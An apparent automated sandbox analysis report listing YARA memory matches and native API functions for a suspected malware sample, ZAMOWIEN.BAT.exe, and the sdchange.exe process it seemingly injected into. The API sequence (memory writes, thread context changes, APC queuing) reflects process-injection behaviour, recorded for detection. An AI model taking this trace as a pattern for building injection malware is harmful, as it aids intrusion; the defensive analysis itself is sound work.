            Source: Yara matchFile source: 00000006.00000002.2885664510.0000000004E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2457299942.0000000035D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2885603414.0000000005530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328335C0 NtCreateMutant,LdrInitializeThunk,4_2_328335C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832B60 NtClose,LdrInitializeThunk,4_2_32832B60
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_32832C70
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_32832DF0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32833090 NtSetValueKey,4_2_32833090
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32833010 NtOpenDirectoryObject,4_2_32833010
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328339B0 NtGetContextThread,4_2_328339B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32833D10 NtOpenProcessToken,4_2_32833D10
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32833D70 NtOpenThread,4_2_32833D70
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32834340 NtSetContextThread,4_2_32834340
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32834650 NtSuspendThread,4_2_32834650
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832AB0 NtWaitForSingleObject,4_2_32832AB0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832AD0 NtReadFile,4_2_32832AD0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832AF0 NtWriteFile,4_2_32832AF0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832B80 NtQueryInformationFile,4_2_32832B80
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832BA0 NtEnumerateValueKey,4_2_32832BA0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832BE0 NtQueryValueKey,4_2_32832BE0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832BF0 NtAllocateVirtualMemory,4_2_32832BF0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832E80 NtReadVirtualMemory,4_2_32832E80
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832EA0 NtAdjustPrivilegesToken,4_2_32832EA0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832EE0 NtQueueApcThread,4_2_32832EE0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832E30 NtWriteVirtualMemory,4_2_32832E30
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832F90 NtProtectVirtualMemory,4_2_32832F90
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832FA0 NtQuerySection,4_2_32832FA0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832FB0 NtResumeThread,4_2_32832FB0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832FE0 NtCreateFile,4_2_32832FE0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832F30 NtCreateSection,4_2_32832F30
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832F60 NtCreateProcessEx,4_2_32832F60
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832CA0 NtQueryInformationToken,4_2_32832CA0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832CC0 NtQueryVirtualMemory,4_2_32832CC0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832CF0 NtOpenProcess,4_2_32832CF0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832C00 NtQueryInformationProcess,4_2_32832C00
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832C60 NtCreateKey,4_2_32832C60
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832DB0 NtEnumerateKey,4_2_32832DB0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832DD0 NtDelayExecution,4_2_32832DD0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832D00 NtSetInformationFile,4_2_32832D00
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832D10 NtMapViewOfSection,4_2_32832D10
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32832D30 NtUnmapViewOfSection,4_2_32832D30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF4650 NtSuspendThread,LdrInitializeThunk,6_2_04FF4650
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF4340 NtSetContextThread,LdrInitializeThunk,6_2_04FF4340
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04FF2CA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04FF2C70
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2C60 NtCreateKey,LdrInitializeThunk,6_2_04FF2C60
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04FF2DF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2DD0 NtDelayExecution,LdrInitializeThunk,6_2_04FF2DD0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04FF2D30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04FF2D10
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04FF2EE0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04FF2E80
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2FE0 NtCreateFile,LdrInitializeThunk,6_2_04FF2FE0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2FB0 NtResumeThread,LdrInitializeThunk,6_2_04FF2FB0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2F30 NtCreateSection,LdrInitializeThunk,6_2_04FF2F30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2AF0 NtWriteFile,LdrInitializeThunk,6_2_04FF2AF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2AD0 NtReadFile,LdrInitializeThunk,6_2_04FF2AD0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04FF2BF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04FF2BE0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04FF2BA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2B60 NtClose,LdrInitializeThunk,6_2_04FF2B60
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF35C0 NtCreateMutant,LdrInitializeThunk,6_2_04FF35C0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF39B0 NtGetContextThread,LdrInitializeThunk,6_2_04FF39B0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2CF0 NtOpenProcess,6_2_04FF2CF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2CC0 NtQueryVirtualMemory,6_2_04FF2CC0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2C00 NtQueryInformationProcess,6_2_04FF2C00
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2DB0 NtEnumerateKey,6_2_04FF2DB0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2D00 NtSetInformationFile,6_2_04FF2D00
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2EA0 NtAdjustPrivilegesToken,6_2_04FF2EA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2E30 NtWriteVirtualMemory,6_2_04FF2E30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2FA0 NtQuerySection,6_2_04FF2FA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2F90 NtProtectVirtualMemory,6_2_04FF2F90
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2F60 NtCreateProcessEx,6_2_04FF2F60
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2AB0 NtWaitForSingleObject,6_2_04FF2AB0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF2B80 NtQueryInformationFile,6_2_04FF2B80
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF3090 NtSetValueKey,6_2_04FF3090
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF3010 NtOpenDirectoryObject,6_2_04FF3010
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF3D70 NtOpenThread,6_2_04FF3D70
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF3D10 NtOpenProcessToken,6_2_04FF3D10
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030D9700 NtReadFile,6_2_030D9700
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030D97F0 NtDeleteFile,6_2_030D97F0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030D9590 NtCreateFile,6_2_030D9590
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030D9A10 NtAllocateVirtualMemory,6_2_030D9A10
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030D98A0 NtClose,6_2_030D98A0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_052DF9B4 NtUnmapViewOfSection,NtClose,6_2_052DF9B4
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_0040364B EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040364B
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_6E351BFF0_2_6E351BFF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328052A04_2_328052A0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281B2C04_2_3281B2C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A12ED4_2_328A12ED
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281D2F04_2_3281D2F0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3284739A4_2_3284739A
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327ED34C4_2_327ED34C
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B132D4_2_328B132D
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328070C04_2_328070C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AF0CC4_2_328AF0CC
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B70E94_2_328B70E9
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328BF0E04_2_328BF0E0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327EF1724_2_327EF172
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3280B1B04_2_3280B1B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328CB16B4_2_328CB16B
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3283516C4_2_3283516C
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B16CC4_2_328B16CC
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328456304_2_32845630
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328BF7B04_2_328BF7B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F14604_2_327F1460
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328BF43F4_2_328BF43F
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289D5B04_2_3289D5B0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C95C34_2_328C95C3
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B75714_2_328B7571
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32845AA04_2_32845AA0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289DAAC4_2_3289DAAC
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A1AA34_2_328A1AA3
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328ADAC64_2_328ADAC6
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328BFA494_2_328BFA49
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B7A464_2_328B7A46
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32873A6C4_2_32873A6C
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281FB804_2_3281FB80
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32875BF04_2_32875BF0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3283DBF94_2_3283DBF9
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328BFB764_2_328BFB76
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328038E04_2_328038E0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3286D8004_2_3286D800
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328959104_2_32895910
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328099504_2_32809950
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281B9504_2_3281B950
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32809EB04_2_32809EB0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32801F924_2_32801F92
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328BFFB14_2_328BFFB1
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328BFF094_2_328BFF09
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327C3FD54_2_327C3FD5
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327C3FD24_2_327C3FD2
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328BFCF24_2_328BFCF2
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32879C324_2_32879C32
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281FDC04_2_3281FDC0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32803D404_2_32803D40
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B1D5A4_2_328B1D5A
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B7D734_2_328B7D73
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328802C04_2_328802C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A02744_2_328A0274
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C03E64_2_328C03E6
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3280E3F04_2_3280E3F0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328BA3524_2_328BA352
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328920004_2_32892000
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C01AA4_2_328C01AA
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B41A24_2_328B41A2
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B81CC4_2_328B81CC
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F01004_2_327F0100
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289A1184_2_3289A118
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328881584_2_32888158
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3281C6E04_2_3281C6E0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FC7C04_2_327FC7C0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328247504_2_32824750
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328007704_2_32800770
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328AE4F64_2_328AE4F6
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A44204_2_328A4420
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B24464_2_328B2446
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328C05914_2_328C0591
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328005354_2_32800535
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FEA804_2_327FEA80
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328B6BD74_2_328B6BD7
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328BAB404_2_328BAB40
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3282E8F04_2_3282E8F0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3280A8404_2_3280A840
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328028404_2_32802840
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327E68B84_2_327E68B8
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328029A04_2_328029A0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328CA9A64_2_328CA9A6
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328169624_2_32816962
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32812E904_2_32812E90
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328BCE934_2_328BCE93
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328BEEDB4_2_328BEEDB
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328BEE264_2_328BEE26
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32800E594_2_32800E59
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3287EFA04_2_3287EFA0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3280CFE04_2_3280CFE0
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32842F284_2_32842F28
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32820F304_2_32820F30
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F2FC84_2_327F2FC8
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A2F304_2_328A2F30
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32874F404_2_32874F40
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_328A0CB54_2_328A0CB5
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32800C004_2_32800C00
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327F0CF24_2_327F0CF2
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_32818DBF4_2_32818DBF
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3280AD004_2_3280AD00
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_3289CD1F4_2_3289CD1F
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4_2_327FADE04_2_327FADE0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_050805916_2_05080591
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_050644206_2_05064420
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_050724466_2_05072446
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FC05356_2_04FC0535
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0506E4F66_2_0506E4F6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FDC6E06_2_04FDC6E0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FBC7C06_2_04FBC7C0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FC07706_2_04FC0770
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FE47506_2_04FE4750
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0505A1186_2_0505A118
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_050481586_2_05048158
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_050801AA6_2_050801AA
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_050741A26_2_050741A2
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_050781CC6_2_050781CC
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_050520006_2_05052000
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FB01006_2_04FB0100
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0507A3526_2_0507A352
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_050803E66_2_050803E6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FCE3F06_2_04FCE3F0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_050602746_2_05060274
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_050402C06_2_050402C0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FB0CF26_2_04FB0CF2
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0505CD1F6_2_0505CD1F
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FC0C006_2_04FC0C00
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FBADE06_2_04FBADE0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FD8DBF6_2_04FD8DBF
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_05060CB56_2_05060CB5
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FCAD006_2_04FCAD00
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_05002F286_2_05002F28
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_05062F306_2_05062F30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_05034F406_2_05034F40
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FD2E906_2_04FD2E90
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0503EFA06_2_0503EFA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FC0E596_2_04FC0E59
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0507EE266_2_0507EE26
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FB2FC86_2_04FB2FC8
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0507CE936_2_0507CE93
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FE0F306_2_04FE0F30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0507EEDB6_2_0507EEDB
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FEE8F06_2_04FEE8F0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FA68B86_2_04FA68B8
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0508A9A66_2_0508A9A6
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FCA8406_2_04FCA840
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FC28406_2_04FC2840
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FC29A06_2_04FC29A0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FD69626_2_04FD6962
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0507AB406_2_0507AB40
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FBEA806_2_04FBEA80
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_05076BD76_2_05076BD7
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_050775716_2_05077571
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FB14606_2_04FB1460
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0505D5B06_2_0505D5B0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_050895C36_2_050895C3
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0507F43F6_2_0507F43F
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0507F7B06_2_0507F7B0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_050056306_2_05005630
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_050716CC6_2_050716CC
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FC70C06_2_04FC70C0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0508B16B6_2_0508B16B
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FCB1B06_2_04FCB1B0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FAF1726_2_04FAF172
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_04FF516C6_2_04FF516C
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_0506F0CC6_2_0506F0CC
